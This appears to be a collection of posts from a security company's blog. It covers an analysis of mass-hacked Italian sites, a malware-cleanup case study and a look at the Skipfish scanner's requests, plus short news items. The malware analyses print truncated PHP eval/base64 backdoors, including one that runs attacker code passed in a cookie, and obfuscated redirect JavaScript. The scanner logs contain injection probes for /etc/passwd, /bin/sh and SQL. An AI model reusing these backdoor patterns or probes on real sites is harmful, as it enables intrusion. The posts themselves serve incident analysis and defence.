Lots of Italian sites getting hacked – Initial analysis

On the last few days we are seeing a large number of reports from Italian sites getting hacked. Way more than the average and way more than from any other country. We got a chance to analyze a couple of them and they all look very much the same.

What is interesting is that we are seeing a wide range of sites, from WordPress blogs, to Joomla-based ones and even simple HTML-only sites. Plus, they are hosted on a large variety of hosting companies, ruling out a shared-server compromise.

Analysis of the attack

All the sites we analyzed followed a similar pattern. First, a script mailcheck.php was added to the root directory of the site:

< ?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIl9kZSgk..'));
echo “checking email…”; ?>

If you decode this script by changing the “eval” for “echo”, you can see what is it doing:

$ php mailcheck.php
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}checking email…

So the mailcheck.php is a backdoor that executes whatever command the attacker is giving.

Also, at the top of any index file they added the following:

< ?php ob_start('security_update'); function security_update($buffer){return $buffer.'< script
language=”javascript”>function t(){return z($a);}var $a=”Z64aZ3dZ22fqb0t-
7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~
tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3e
..
;}//important security update ?>

They try to hide what they are doing with a “security_update” string at the start of it and an “important security update” comment at the end. Very clever… In fact, one of our clients saw that and didn’t want to remove the code because he thought it was indeed an important update.

What this code does is just a malicious javascript that redirects and loads malware from a couple of other sites. This is what it looks like when I change the “eval” for “alert”:

Here is the code a bit more organized:


Are you seeing issues like that on your site? If you are infected try removing those files and looking for strange entries on your index files. Also, my recommendation is that you revert back to a previous (and clean) backup or do a full scan on all your site to make sure there is nothing hidden in there. As always, you can contact us for help.

Want to read more stories like this one? Follow @sucuri_security on twitter or subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net.

APT – Attempting to steal your domain

We all hear of APT (advanced persistent threat) and this is a good example of one trying to steal the vl.com domain. Very good read:

Dreamhost account hacked

Perl.com hacked – Security archive case study

Security Archive: Remembering security incidents to make sure we don’t commit the same mistakes over and over again.

Want to read more stories like this one? Follow @sucuri_security on twitter or subscribe to our RSS feed. Interested in a web site security monitoring solution? Visit sucuri.net.

Jan 17th, 2008. Every person who visited the site of the famous programming language Perl (perl.com), got redirected to a porn site hosted at grepblogs.net. Uh-oh, when was it hacked? Did anyone compromised the source code from Perl? What about the accounts at perl.com, where they stolen?

During these incidents, people tend to overreact and think of the worst. However, what happened was very simple… That was the official explanation:

We at O’Reilly just got bit on perl.com, which redirected to a porn site courtesy a piece of remotely-included Javascript. One of our advertisers was using an ads system that required our pages to load Javascript from their site. It only took three things to turn perl.com into porn.com: (1) the advertiser’s domain lapsed, (2) the porn company bought it, (3) they replaced the Javascript that we were loading with a small chunk that redirected to the porn site (note that nothing on or about perl.com changed).

Very interesting.. The Perl.com servers weren’t hacked at all (or even touched). A simple remote javascript got modified and their site became a “porn” paradise.

What mistakes they did:

  1. They included javascript from remote sites. This is a common thing nowadays (specially if you run ads), but you have to choose your sources wisely. Google is a good one, but grepblogs doesn’t sound very authoritative.
  2. The grepblogs.net domain expired, the javascript was not loading and nobody noticed. That means that they were not monitoring the site as they should.

What to learn from it and how to protect ourselves?

  1. Limit the amount of external content you embed on your site. If you need ads, choose a reputable company that will not go away and will take security seriously.
  2. Monitor the content of what you include on your site. If you have to use scripts from remote locations, regularly check if they are still in business, check if the script is still responding properly and if they didn’t get compromised.
  3. That’s the best advice: whenever possible, store your content locally where you can control.

What do you think? What additional steps we can take to avoid issues like that?

A closer look at the Skipfish

Skipfish was just released last week by Michal Zalewski and it seems that in just those few days out there, everyone is talking about it. If you haven’t heard about it, it is a “A fully automated, active web application security reconnaissance tool“. Cool! Let’s start.

I decided to give it a try against three different servers and applications to see what it does under the covers by watching the logs that it generates. First, I tried against an empty web server with a fresh Apache installed, followed by live WordPress blog and then against my own web application (http://sucuri.net).

*btw, after the tests we nick named Skipfish as the “404 generator” (the fastest one ever). You will understand later.

1- Trying against an empty web server – Default Apache install

$ ./skipfish -o /var/www/out/sk http://192.168.2.15
skipfish version 1.10b by lcamtuf@google.com

Scan statistics
---------------

Scan time : 0:10:40.0182
HTTP requests : 1814 sent (2.83/s), 727.83 kB in, 221.14 kB out (1.48 kB/s)
Compression : 0.00 kB in, 0.00 kB out (0.00% gain)
HTTP exceptions : 579 net errors, 0 proto errors, 0 retried, 122265 drops
TCP connections : 587 total (3.09 req/conn)
TCP exceptions : 0 failures, 579 timeouts, 3 purged
External links : 0 skipped
Reqs pending : 0

Database statistics
-------------------

Pivots : 2 total, 2 done (100.00%)
In progress : 0 pending, 0 init, 0 attacks, 0 dict
Missing nodes : 0 spotted
Node types : 1 serv, 1 dir, 0 file, 0 pinfo, 0 unkn, 0 par, 0 val
Issues found : 2 info, 2 warn, 0 low, 2 medium, 0 high impact
Dict size : 1886 words (2 new), 63 extensions, 21 candidates

[+] Wordlist 'skipfish.wl' updated (2 new words added).
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 2
[+] Looking for duplicate entries: 2
[+] Counting unique issues: 2
[+] Writing scan description...
[+] Counting unique issues: 2
[+] Generating summary views...
[+] Report saved to '/var/www/out/sk/index.html' [0x6687dcb8].
[+] This was a great day for science!

The first scan took a while (around 10 minutes) to send only 1,000 requests, way longer than what I thought. After doing a brief analysis I realized that OSSEC had blocked it:

** Alert 1269261085.22134: mail  - web,accesslog,web_scan,recon,
2010 Mar 22 09:31:25 (ubuntu) 192.168.55.15->/var/log/apache2/access.log
Rule: 31151 (level 10) -> 'Mutiple web server 400 error codes from same source ip.'
Src IP: 192.168.55.15
User: (none)
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.pl HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.py HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.sh HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.sql HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.tar.gz HTTP/1.1" 404 330 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.test HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876.tmp HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:09:45:55 -0300] "GET /sfi9876/ HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"

Good to know that OSSEC did its job, but let’s try to analyze without OSSEC running:

$ ./skipfish -o /var/www/out/sk2 http://192.168.2.15
Scan statistics
---------------

Scan time : 0:16:02.0149
HTTP requests : 2509657 sent (2608.38/s), 1522820.00 kB in, 469407.19 kB out (2070.60 kB/s)
Compression : 0.00 kB in, 0.00 kB out (0.00% gain)
HTTP exceptions : 0 net errors, 0 proto errors, 0 retried, 0 drops
TCP connections : 24855 total (100.97 req/conn)
TCP exceptions : 0 failures, 0 timeouts, 3 purged
External links : 283 skipped
Reqs pending : 0

Database statistics
-------------------

Pivots : 591 total, 591 done (100.00%)
In progress : 0 pending, 0 init, 0 attacks, 0 dict
Missing nodes : 91 spotted
Node types : 1 serv, 53 dir, 459 file, 2 pinfo, 56 unkn, 20 par, 0 vall
Issues found : 39 info, 0 warn, 5 low, 96 medium, 0 high impact
Dict size : 2058 words (172 new), 67 extensions, 256 candidates

[+] Wordlist 'skipfish.wl' updated (172 new words added).
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 591
[+] Looking for duplicate entries: 591
[+] Counting unique issues: 164
[+] Writing scan description...
[+] Counting unique issues: 591
[+] Generating summary views...
[+] Report saved to '/var/www/out/sk2/index.html' [0x6d522ed2].
[+] This was a great day for science!

This time it look a while too, but sent around 2.5 million requests. Wow. Let’s look at the logs to see how it looks like:

192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET / HTTP/1.1" 206 45 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876 HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.test HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.asmx HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.dll HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.inc HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.log HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /~sfi9876 HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876/ HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.pm HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.db HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.gz HTTP/1.1" 404 326 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /sfi9876.sql HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
..
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.ora HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.part HTTP/1.1" 404 329 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.log HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.inc HTTP/1 .1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /catalogs.dll HTTP/1.1" 404 328 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
..
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.jsf HTTP/1.1" 404 322 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.2.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.java HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.vb HTTP/1.1" 404 321 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.key HTTP/1.1" 404 322 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:02 -0300] "GET /jj.jhtml HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b
..
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.ws HTTP/1.1" 404 322 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.vbs HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.old HTTP/1.1" 404 323 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:05 -0300] "GET /top.conf HTTP/1.1" 404 324 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
..
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.db HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.html HTTP/1.1" 404 329 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.gz HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"
192.168.55.15 - - [22/Mar/2010:10:15:11 -0300] "GET /register.pm HTTP/1.1" 404 327 "http://192.168.55.15/" "Mozilla/5.0 SF/1.10b"

# cat /var/log/apache2/access.log | grep "SF/1.10b" | grep " 404 "| wc -l
2510915

That’s lots and lots of 404s. I kid you not, but my access_log is now almost 325M of only 404s by skipfish (that’s why the nickname “404 generator”):

# ls -lh /var/log/apache2/
-rw-r----- 1 root adm 325M 2010-03-22 10:29 access.log

For every entry in their dictionary it tried all possible extensions, all possible names, etc. For my first test, it didn’t generate any useful information, but that was expected. What I didn’t expect was that large amount of requests, that’s for sure.

2- Trying against a WordPress blog

I started it again using the default options and using the default dictionary.

$ ./skipfish -o /var/www/out/sk3 http://blog.me
Scan statistics
---------------

Scan time : 0:49:27.0338
HTTP requests : 53864 sent (18.74/s), 484393.19 kB in, 11623.50 kB out (167.16 kB/s)
Compression : 0.00 kB in, 0.00 kB out (0.00% gain)
HTTP exceptions : 0 net errors, 0 proto errors, 0 retried, 0 drops
TCP connections : 53874 total (1.25 req/conn)
TCP exceptions : 0 failures, 0 timeouts, 0 purged
External links : 401 skipped
Reqs pending : 13280

Database statistics
-------------------

Pivots : 370 total, 50 done (13.51%)
In progress : 236 pending, 57 init, 15 attacks, 12 dict
Missing nodes : 58 spotted
Node types : 1 serv, 133 dir, 1 file, 0 pinfo, 221 unkn, 14 par, 0 val
Issues found : 15 info, 0 warn, 33 low, 114 medium, 0 high impact
Dict size : 2107 words (49 new), 70 extensions, 256 candidates

[!] Scan aborted by user, bailing out!
[+] Wordlist 'skipfish.wl' updated (49 new words added).
[+] Copying static resources...
[+] Sorting and annotating crawl nodes: 370
[+] Looking for duplicate entries: 370
[+] Counting unique issues: 304
[+] Writing scan description...
[+] Counting unique issues: 370
[+] Generating summary views...
[+] Report saved to '/var/www/out/sk3/index.html' [0x7545c75d].
[+] This was a great day for science!

It generated again that insane ammount of 404s, but I noticed a different check in there now. For every directory it found it tried this request:

1.2.83.25 - - [22/Mar/2010:13:47:32 +0000] "GET /?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5=cefhilno
su%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 200 30010 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:36 +0000] "GET /page/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5=cef
hilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:37 +0000] "GET /category/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5
=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:44 +0000] "GET /img/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_test5=cefh
ilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 206 2023 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:45 +0000] "GET /category/google-analytics.com/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORST
eeinnnosttx--*&_test5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:51 +0000] "GET /category/vps/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx--*&_t
est5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 200 16599 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
--
1.2.83.25 - - [22/Mar/2010:13:47:54 +0000] "GET /category/vps/logs/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=CEEFLMORSTeeinnnosttx-
-*&_test5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
1.2.83.25 - - [22/Mar/2010:13:47:59 +0000] "GET /category/vps/logs/google-analytics.com/?_test1=ccddeeeimmnossstwwxy.:\\\\\\&_test2=acdepsstw%2F%2F&_test3=bhins%2F%2F&_test4=C
EEFLMORSTeeinnnosttx--*&_test5=cefhilnosu%2F%2F%2F&_test6=acceiilpprrrssttt1)(&_test7=aaaceijlprrsttv1):( HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"

What I also found interesting is that it tried to inject data using the user-agent as well:


1.2.83.25 - - [22/Mar/2010:13:48:03 +0000] "GET /category/vps/logs/%2F%2Fskipfish.invalid%2F%3B%3F HTTP/1.1" 404 310 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
1.2.83.25 - - [22/Mar/2010:13:48:03 +0000] "GET /category/vps/\\\\'\\\\\" H TTP/1.1" 301 - "sfish\\\\'\\\\\"" "Mozilla/5.0 SF/1.10b, sfish\\\\'\\\\\""

These are a few more requests it did:


1.2.83.25 - - [22/Mar/2010:13:47:59 +0000] "GET /category/vps/.htaccess.aspx>\">'>'\" HTTP/1.1" 404 8758 "http://blog.me/" "Mozilla/5.0 SF/1.10b"
1.2.83.25 - - [22/Mar/2010:13:47:59 +0000] "GET /category/vps/logs/google-analytics.com/?_test1=c:\\windows\\system32\\cmd.exe&_test2=%2Fetc%2Fpasswd&_test3=|%2Fbin%2Fsh&_test
4=(SELECT%20*%20FROM%20nonexistent)%20--&_test5=>%2Fno%2Fsuch%2Ffile&_test6=

Google’s Webpage removal request tool

Do you need to remove sensitive information from Google? Found a dead link in our search results? Want to help us improve our SafeSearch filter?

Check out Google’s Webpage removal request tool:

https://www.google.com/webmasters/tools/removals?pli=1

People often complain that once something is “out there”, you can’t get it back anymore, but this feature can certainly help when you got sensitive information exposed and needs some damage control. Google +1.

Today is not a good day to be blacklisted

Today is definitely not a good day to be blacklisted as Google seems to be “busy”. We have been trying to help some clients to get their sites reviewed and removed from Google’s blacklist, but all we get at the “Webmasters tools” is: “Our system is currently busy. Please try again in a few minutes.”.

Well, we have been getting this message since last night, so even after removing all the malware and cleaning our client’s sites, we can’t get Google to review them again…

Big fail for google today. They do a good job spotting malware and blocking sites, but they also need to be fast to respond and unblock when a site is clean.Hopefully they will be back soon.

Removing malware from a web site – Case Study

We deal with web-based malware every day here at Sucuri. Some are encrypted and very hard to detect and remove, but most of them are not. This case study is about the later, simpler, but very annoying web-based javascript malware that we dealt with. Hope you like it.

It all started a few days ago when a prospective client contacted us saying that they were notified that their site was being reported as an “attack site” by Google Chrome, but was working well on Explorer. They wanted to make sure it worked well on Chrome too…

The client wasn’t a technical person, so he was not aware that their site was hosting malware and blacklisted by Google. Every browser (Chrome, Firefox, etc) that used Google’s blacklist would report their site as an “attack site”.

Not good news for any site owner. You lose credibility, lose traffic and money. If they had been using our Web-based Integrity monitor, that would not have happened, but since they didn’t, now it was time to fix the problem.

We will detail the steps we took hoping that can it useful for anyone else dealing with these issues.

1- Shutting down the site

We didn’t want to see their site spreading more malware, so we got the FTP credentials (shared host, so no SSH access), and renamed the public_html directory to something else and added a quick “were are in maintenance mode” index.html to the site.

$ rename public_html publichtml_saved
$ mkdir public_html
$ put newindex public_html/index.html

2- Changing the passwords

We didn’t know how the attackers got in, but changing the password was a good defense to make sure they wouldn’t mess up with our work or get back in. Plus, since it was a shared host, there wasn’t much more we could do.

3- Analyzing the malware

To analyze the malware, we first downloaded the whole public_html directory that we have saved. As always, we used our friendly ncftpget to get the job done:

$ mkdir clientX
$ ncftpget -z -u USER -p PASS -R clientX.com ./clientX /publichtml_saved

Once it was done, we ran our code-scan tool to find out all the malware on the web-based files. We won’t be sharing this tool for now, but you can easily grep for iframes, javascripts pointing to external php files or very big encoded lines to find 99% of the malware.

$ code-scan clientX
** PHP inside javascript: **
clientX/public_html/xx/Install.html:
<script  src="http://hentai.com.br/images/gifimg.php >
clientX/public_html/xx/License.html:
< script src=http://hentai.com.br/images/gifimg.php >
clientX/public_html/xx/file.js:
document.write("<script src="http://macagnanmalhas.com.br/imagens_fck/conteudo…
clientX/public_html/xx/file2.js:
document.write(‘<script src="http://hentai.com.br/images/gifimg.ph..
..

As we scanned, we noticed that EVERY single html and javascript file had a reference to these two sites included. Every single one. The hentai site has been fixed and was already blacklisted as we analyzed it, but the other one from macagnanmalhas was still live at the time of our analysis. We tried to see what it was doing by dumping the content:

$ lynx –source –dump http://macagnanmalhas.com.br/imagens_fck/conteudo.php
document.write(“<script src="http://craisa.com.br/up/topluto4.php>");

Hum… So it was actually pointing to another javascript at craisa.com.br that was in fact pointing at another site (how annoying):

$ lynx –source –dump http://craisa.com.br/up/topluto4.php
document.write(“<script src="http://grupogrotta.com.br/tao/trabalhe.php />");

And the final javascrip was already removed, so we couldn’t analyze it. Oh well.. Moving on..

We also detected that every single PHP file had malware injected at the top of the script. They all started with:

<?php  eval (base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygndTVzeicpKXtmdW
jUpeyRlPXByZWdfbWF0Y2goJyNbXCciXVteXHNcJyJcLiw7XD8hXFtcXTovPD5cKFwpXXszMCx9IycsJHYp

What this script does? After changing the “eval” for an “echo” statement, we can see:

Basically a PHP script to inject malicious code in a site and act as a backdoor.

4- Fixing the site

Since the attackers went crazy and infected every single file, manually removing the malware was out of question. If they had a backup of the site, it would be easy, but since they didn’t have it either, we had to resort to some shell scripting.

What did we do? We knew there was only these 3 instances of malware spread at all the files. So we ran the find command passing the files to sed to remove those malware lines.

$ find ./ | grep -i -E “\.html|\.htm|\.php|\.js” | xargs sed -i “s#<?php eval (base64_decode ( .*)); ??>##g”
$ find ./ | grep -i -E “\.html|\.php|\.js” | xargs sed -i ‘s#<script src="http://mac.*/script"> ##g’
$ find ./ | grep -i -E “\.html|\.php|\.js" | xargs sed -i ‘s#< script src=http://hentai..*/script> ##g’

Done! All files fixed, now we used ncftpput to put the same back up:

$ ncftpput -z -u USER -p PASS -R clientX.com /public_html ./clientX/public_html

5- Lessons Learned

Malware is a pain and anyone can be affected. However, they didn’t have any security measures in place, making it much harder to deal with it. For reference, our suggestions were (and they apply to every site on shared servers):

  1. Make sure you have backups done at least weekly
  2. Use strong FTP passwords
  3. Keep your desktop virus-free
  4. Monitor your web sites for malware/blacklisting
  5. Keep your web applications updated (if using any)

Good bye securityfocus

I just read the sad announcement that SecurityFocus is going to be shut down (or phased out to sound more nice). The mailing lists will remain for a while, but all the rest will be moved to the Symantec web site…

Take a look: http://www.securityfocus.com/news/11582:

Beginning March 15, 2010 SecurityFocus will begin a transition of its content to Symantec Connect. As part of its continued commitment to the community, all of SecurityFocus’ mailing lists including Bugtraq and its Vulnerability Database will remain online at www.securityfocus.com There will not be any changes to any of the list charters or policies and the same teams who have moderated list traffic will continue to do so. The vulnerability database will continue to be updated and made available as it is currently. DeepSight and other security intelligence related offerings will remain unchanged while Infocus articles, whitepapers, and other SecurityFocus content will be available off of the main Symantec website in the coming months.

While the news portal section of SecurityFocus will no longer be offered, we think our readers will be better served by this change as we combine our efforts with Symantec Connect and continue to provide a valuable service to the community. As always, if you have any questions or concerns you can reach us at editor-at-securityfocus-dot-com.

Security Focus was a good site while it last and served its purpose very well.

Cloud-based (FILE) Integrity Monitoring

If you are a system administrator or have ever worked with security, you probably heard the terms file integrity monitoring or file integrity checking. If you didn’t, you at least heard of tripwire or OSSEC or AIDS (they are popular open source file integrity checking tools).

How do they work? Generally they are installed on a server, where they create a cryptographic checksum of all the critical files (and registry entries) and if/when something changes you get an alert. Useful, no? So, if an attacker (or anyone) goes and modify your hosts file you would get the alert: “File /etc/hosts has been modified”.

Yes, very useful!

However, as we move to a cloud-based world, how can this still work?

Your email is now stored at gmail, your Whois data is stored at a registrar that you don’t control either. Your DNS may be hosted outside too, where you can’t verify locally if the zones have been changed. Your sites may be hosted a multiple locations outside your control.

How do you guarantee that the integrity of your data is intact? How do you guarantee that the integrity of your Internet presence (of your brand, your site) is intact?

If you remember the last time twitter was hacked, the attackers didn’t get access to their servers, but they attacked their registrar and modified the DNS to point to another system. Nothing that twitter could have protected from the inside.

That’s where cloud-based (or web-based) integrity monitoring comes into play. As we become more decentralized, we need a way to verify that our external data is still safe.

Well, that’s what our company does. We offer a cloud-based Integrity monitoring solution that verifies that your Internet presence have not been altered. We monitor your DNS, your Whois information, your web sites, your blacklist status (at multiple databases), your SSL certificates, and alert you whenever their integrity is changed.

How useful is it? As the integrity of your data changes, it allows us to detect malware injection, spam, defacements, attempts to steal domains, database errors and even if your site just went offline. Curious to try? visit: http://sucuri.net and let us know what you think.

Screenshot of the apache.org defacement (10 years ago)

We recently published a case study of the apache.org defacement that happened 10 years ago. You can read it here: Apache.org defaced – Security archive case study

We didn’t publish the screenshot of the defacement, but our friend @EdiStrosar sent us a link to it. Check it out:
Very funny…